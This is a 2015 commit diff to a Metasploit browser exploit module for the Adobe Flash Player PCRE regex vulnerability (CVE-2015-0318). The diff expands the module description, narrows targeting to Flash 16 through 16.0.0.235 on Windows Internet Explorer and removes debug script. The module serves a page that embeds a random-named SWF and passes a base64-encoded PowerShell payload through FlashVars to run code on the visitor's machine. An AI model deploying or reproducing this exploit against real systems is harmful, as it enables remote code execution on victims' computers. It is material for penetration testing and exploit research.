Final

wchen-r7 · wchen-r7 · commit 2b199315d4ee · 2015-03-13T12:30:41.000-05:00
diff --git a/modules/exploits/windows/browser/adobe_flash_pcre.rb b/modules/exploits/windows/browser/adobe_flash_pcre.rb
@@ -17,12 +17,15 @@ def initialize(info={})
     super(update_info(info,
       'Name'           => "Adobe Flash Player PCRE Regex Vulnerability",
       'Description'    => %q{
-        Flash
+        This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error
+        in the PCRE engine, specifically in the handling of the \c escape sequence when followed by
+        a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Mark Brand' # Found vuln
+          'Mark Brand', # Found vuln
+          'sinn3r'      # MSF
         ],
       'References'     =>
         [
@@ -37,8 +40,7 @@ def initialize(info={})
         },
       'DefaultOptions'  =>
         {
-#          'InitialAutoRunScript' => 'migrate -f',
-          'Retries'              => false
+          'Retries' => true
         },
       'Platform'       => 'win',
       'BrowserRequirements' =>
@@ -48,7 +50,9 @@ def initialize(info={})
           :method  => "LoadMovie",
           :os_name => OperatingSystems::Match::WINDOWS,
           :ua_name => Msf::HttpClients::IE,
-          #:flash   => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
+          # Ohter versions are vulnerable but .235 is the one that works for me pretty well
+          # So we're gonna limit to this one for now. More validation needed in the future.
+          :flash   => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.235' }
         },
       'Targets'        =>
         [
@@ -60,6 +64,8 @@ def initialize(info={})
   end
 
   def exploit
+    # Please see data/exploits/CVE-2015-0318/ for source,
+    # that's where the actual exploit is
     @swf = create_swf
     super
   end
@@ -81,7 +87,6 @@ def on_request_exploit(cli, request, target_info)
   end
 
   def exploit_template(cli, target_info)
-
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
     psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
@@ -96,18 +101,8 @@ def exploit_template(cli, target_info)
     <param name="Play" value="true" />
     <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
     </object>
-
-  <script>
-  function debug_alert(msg) {
-    console.log(msg);
-  }
-
-  function debug_print(msg) {
-    console.log(msg);
-  }
-  </script>
     </body>
- </html>
+    </html>
     |
 
     return html_template, binding()
